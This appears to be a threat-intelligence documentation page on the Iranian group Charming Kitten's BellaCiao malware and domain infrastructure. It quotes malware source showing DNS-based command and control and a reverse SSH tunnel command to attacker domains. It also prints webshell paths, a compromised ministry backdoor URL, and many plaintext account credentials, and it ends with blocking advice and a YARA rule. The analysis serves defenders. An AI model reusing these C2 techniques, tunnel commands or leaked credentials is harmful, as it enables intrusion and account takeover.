Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/KittenBusters/CharmingKitten/llms.txt

Use this file to discover all available pages before exploring further.

This page documents malicious domain infrastructure used by Charming Kitten (IRGC-IO Division 1500, Department 40). All domains listed are associated with threat actor operations.

Overview

The domain infrastructure used by Charming Kitten has been extracted from the BellaCiao malware source code (Episode 3) and infrastructure documentation (Episode 4). These domains serve as command-and-control (C2) infrastructure and data exfiltration channels.

BellaCiao C2 Domains

Primary C2 Domains (Variant 1)

From Service1.cs in BellaCiao source code: 
// File: MicrosoftAgentServices/Service1.cs:23-24
public string dnsdomain = ".eposta.maill-support.com";
public string dnsdomain2 = ".eposta.mailupdate.info";

Domain Details

eposta.maill-support.com

Primary C2 Domain
  • Used by BellaCiao Variant 1
  • DNS-based command channel
  • Subdomain pattern: [random]EXH.eposta.maill-support.com

eposta.mailupdate.info

Backup C2 Domain
  • Fallback if primary domain fails
  • Same subdomain pattern
  • Activated after 60-second delay

BellaCiao DNS C2 Protocol

The malware uses a sophisticated DNS-based C2 mechanism: 
// Random subdomain generation
string randstr = RandomString(2, false) + RandomString(3, true);
// Example: "ABxyz"

// DNS query construction
string finalhost = randstr + "EXH" + dnsdomain;
// Example: "ABxyzEXH.eposta.maill-support.com"

// DNS resolution for command retrieval
System.Net.IPHostEntry query = System.Net.Dns.GetHostEntry(finalhost);
string response = query.AddressList[0].ToString();

Command IP Encoding

The C2 server responds with specially crafted IP addresses that encode commands:
IP PatternCommandAction
*.*.168.58Deploy webshellWrite malicious .aspx file
212.175.168.59CleanupRemove deployed webshells
212.175.*.*Predefined targetUse hardcoded file paths
*.175.168.*Exchange path 1Deploy to /owa/auth/Current/themes/resources/
*.176.168.*Exchange path 2Deploy to /owa/auth/Current/themes/
*.177.168.*Exchange path 3Deploy to /owa/auth/Current/

Secondary C2 Domains (Variant 2)

From iis.ps1 in BellaCiao Variant 2: 
# File: Variant2/iis.ps1:7-8
$domain = "twittsupport.com"
$domain2 = "msn-center.uk"

twittsupport.com

Primary Tunnel Domain
  • Used for reverse SSH tunneling
  • Port: 443
  • Credential: Israel:Israel@123!

msn-center.uk

Backup Tunnel Domain
  • Fallback tunnel server
  • Same port and credentials
  • 10-second delay before fallback

Tunnel Configuration

The PowerShell implant establishes reverse tunnels: 
# Primary tunnel command
$command = "echo Y | $Path $domain -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!"

# Backup tunnel command  
$command2 = "echo Y | $Path $domain2 -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!"

Compromised Domain Infrastructure

Turkish Foreign Ministry

From eposta.txt - actual compromised URL: 
C2 IP: 212.175.168.58
Backdoor URL: https://eposta.mfa.gov.ct.tr/aspnet_client/system_web/aspnet_client.aspx
The malware deployed webshells to multiple paths on compromised Exchange servers:
# IIS Paths
c:\inetpub\wwwroot\aspnet_client\aspnet.aspx
c:\inetpub\wwwroot\aspnet_client\system_web\aspnet.aspx

# Exchange Server Paths
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx

Campaign-Specific Domains

Moses Staff Campaign

From Episode 4 infrastructure documentation:
DomainTLDRegistrarRegistration DateStatus
moses-staff.io.ionamecheap.com1/9/2024Ticket #2073
moses-staff.to.tonamecheap.com1/9/2024Credential exposed
moses-staff.se.seprq.se1/9/2024Ticket #2072

Moses Staff Credentials

moses-staff.io:
Account: May.Arnold@protonmail.com:JHg&%asjh98*&^$dI&*^fd
Ticket: #2073

moses-staff.to:
Account: kelyanpodolski34@protonmail.com:ghfycf6787$DSHJ&^%#q

moses-staff.se:
Ticket: #2072

Israel Talent Campaign

DomainTLDRegistrarRegistration DatePurpose
israel-talent.com.comtheonionhost.com25/2/2024Primary phishing domain
israel-talent.xyz.xyznamesilo.com20/1/2025Alternate domain
israel-talent.com:
Hosting: theonionhost.com
Account: timothyefimov@protonmail.com:{1h)p0f_R(Ln
Registration: 25/2/2024
Cost: $140 (3 months, covers hosting + DNS + old domain)
Ticket: #2029
IP: 95.169.196.220
Alternate Credentials: timothyefimov@protonmail.com:Kh74QjGDq35NtvB

israel-talent.xyz:
Registrar: namesilo.com
Account: valentinepirogova
Registration: 20/1/2025
Renewal: 27/1/2025

ProtonMail Account:
Date: 16/7/2023
Cost: €5
Ticket: #2042

Abrahams Ax Campaign

ComponentDetails
Domain Providerprq.se (kundcenter.prq.se)
Registration10/10/2024
Cost$100 (1 year)
AccountGDavies007@proton.me:J7Z4pw-G
CredentialsGDavies007@proton.me:6EF94ELUgAKdPqH
TOR Hostingportal.imprezahost.com
TOR Accountnansi.morad@protonmail.com:vAFc,7mNvi+-G
TOR Registration5/11/2023 - $90

Additional Campaign Domains

BBM Movement

bbmovements.com
  • Registrar: namesilo.com
  • Registration: 8/11/2024
  • Renewal: 13/11/2024
  • Ticket: #bbm

Termite

termite.nu

Dreamy Jobs

dreamy-jobs.com

Wazayif Halima

wazayif-halima.org

SecNetDC Infrastructure

Domain: secnetdc.com

Hosting Provider: modernizmir.net
Account: Meriyalee@protonmail.com:MXQ8GLX5qg3yEUV
Registration: 23/8/2023
Payment: 26/8/2023 - $10
Ticket: #2063
API Key: 3A5MBwQsQvJdernıZ3FtFMPnoБs6HfMdWK

Domain Registration:
Provider: modernizmir.net  
Account: Meriyalee@protonmail.com:MXQ8GLX5qg3yEUV
Renewal: 10/1/2025
Payment: 20/1/2025 - $70

Tecret Infrastructure

Domain: tecret.com

Hosting: theonionhost.com
Account: cybersonix@protonmail.com:RN8OiQ6Y(%H0
Registration: 29/1/2024
Payment: 2/2/2024 - $3
Ticket: #2067

Domain Registration: modernizmir.net
Account: cybersonix@protonmail.com:2tJuGXqHFbAJNjS
Renewal: 6/11/2024
Payment: 11/11/2024
Note: SSL included (1/1 renewal)

Cavinet Infrastructure

Domain: cavinet.org

Registrar: namecheap.com
Registration: 1/12/2022
Cost: $60 (3 months)
Ticket: #2016
Account: cavinet.ltd@protonmail.com:CMEPZ9WMb8difTw

Hosting: temok.com  
Renewal: 2/3/2024
Cost: $45
Ticket: #2017

Domain Naming Patterns

Observed Patterns

Charming Kitten uses specific patterns in their domain selection:
  1. Typosquatting Mail Services
    • eposta.maill-support.com (double-l)
    • eposta.mailupdate.info
    • msn-center.uk
  2. Regional/Geopolitical Themes
    • israel-talent.com/xyz
    • moses-staff.* (multiple TLDs)
    • wazayif-halima.org (Arabic: jobs)
  3. Technical/Support Themes
    • twittsupport.com
    • secnetdc.com
    • tecret.com
  4. Generic Business Themes
    • dreamy-jobs.com
    • cavinet.org

Subdomain Structure

BellaCiao generates randomized subdomains: 
[2 uppercase letters][3 lowercase letters]EXH.[primary domain]
Example: ABxyzEXH.eposta.maill-support.com

C2 Communication Flow

1

Implant Initialization

BellaCiao service starts on compromised system with 24-hour timer
2

Random Subdomain Generation

Generate 2-char uppercase + 3-char lowercase random string (e.g., “ABxyz”)
3

DNS Query Construction

Append “EXH” and primary domain: ABxyzEXH.eposta.maill-support.com
4

DNS Resolution

Query DNS server for IP address of constructed subdomain
5

Command Parsing

Parse returned IP address to determine command:
  • Last octet = 58: Deploy webshell
  • IP = 212.175.168.59: Remove webshells
6

Fallback Mechanism

If primary domain fails, wait 60 seconds and try backup domain

Domain Infrastructure Timeline

Registrar Distribution

RegistrarDomainsOperations
namecheap.com3+cavinet.org, moses-staff.io, moses-staff.to
namesilo.com4+bbmovements.com, dreamy-jobs.com, wazayif-halima.org, israel-talent.xyz
prq.se3+moses-staff.se, termite.nu, Abrahams Ax
modernizmir.net2+secnetdc.com, tecret.com
theonionhost.com5+moses-staff, israel-talent.com, dreamy-jobs, wazayif-halima, tecret
impreza.host2+moses-staff, Abrahams Ax

Detection and Mitigation

Defensive Measures:
  • Block all domains listed on this page at DNS/firewall level
  • Monitor for DNS queries matching pattern [A-Z]{2}[a-z]{3}EXH.*
  • Alert on connections to IP ranges: 95.169.196., 95.183.51., 212.175.168.*
  • Inspect outbound connections on port 443 to non-standard destinations
  • Monitor for ProtonMail accounts in network traffic associated with listed patterns

YARA Rule for Domain Detection

rule CharmingKitten_BellaCiao_Domains {
    meta:
        description = "Detects BellaCiao C2 domains in memory or files"
        author = "Threat Intel Team"
        reference = "Episode 3 & 4 Leaks"
    
    strings:
        $c2_1 = "eposta.maill-support.com" ascii wide
        $c2_2 = "eposta.mailupdate.info" ascii wide
        $c2_3 = "twittsupport.com" ascii wide
        $c2_4 = "msn-center.uk" ascii wide
        $c2_5 = "moses-staff.io" ascii wide
        $c2_6 = "israel-talent.com" ascii wide
    
    condition:
        any of ($c2_*)
}
See also:

References